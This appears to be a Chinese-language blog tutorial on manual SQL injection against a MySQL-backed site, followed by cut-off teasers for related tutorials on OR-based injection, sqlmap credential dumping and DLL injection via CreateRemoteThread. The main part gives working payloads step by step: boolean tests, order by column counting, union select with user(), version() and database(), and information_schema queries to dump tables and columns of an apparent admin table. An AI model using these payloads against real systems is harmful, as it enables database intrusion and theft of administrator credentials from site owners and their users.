注入點:******x
and1=1 返回正確 and1=2返回錯誤
說明存在注入點
+order+by+11 反悔正確
+order+by+12 返回錯誤
說明存在11個字段
+union+select+1,2,3,4,5,6,7,8,9,10,11 看清楚那裡是-13 是讓他報錯用的 也可以用and 1=2 報錯
user() 資料庫使用者名稱
version() 資料庫版本
database() 當前使用的資料庫名
5.0說明可以直接查表
+union+select+1,2,3,4,unhex(hex(group_concat(table_name))),6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()
直接爆表
有乙個t_users 應該是存放管理員的
先把t_users轉換為hex
爆列:+union+select+1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11+from+information_schema.columns+where+table_name=0x745f7573657273
然後就就是查詢了
新or注入教程
記得一年前火狐有一位朋友問,如果乙個站過濾了and和 的話,改怎麼注入啊?當時我隨口說了句 or注入 後來又一次看貼的時候,看到他問我該怎麼利用呢?我就寫了幾個簡單的語句給他,叫他自己變換,他很感激我,還說網上沒有這種方法。我到網上查了查,還真沒有or注入專題呢 or 1 1除外 呵呵,所以,一年後...
SQLmap注入教程
一次sqlmap注入點並且dump出賬號密碼全程 判斷注入點 sqlmap.py u 存在注入url 爆出所有資料庫名字 sqlmap.py u 存在注入url dbs 檢視當前使用賬號 sqlmap.py u 存在注入url current user 1 檢視當前資料庫 sqlmap.py u 存...
程式注入教程集合
遠端執行緒注入dll 遠執行緒注入原理是利用windows 系統中createremotethread 這個api,其中第4個引數是準備執行的執行緒,我們可以將loadlibrary 填入其中,這樣就可以執行遠端程序中的loadlibrary 函式,進而將我們自己準備的dll載入到遠端程序空間中執行...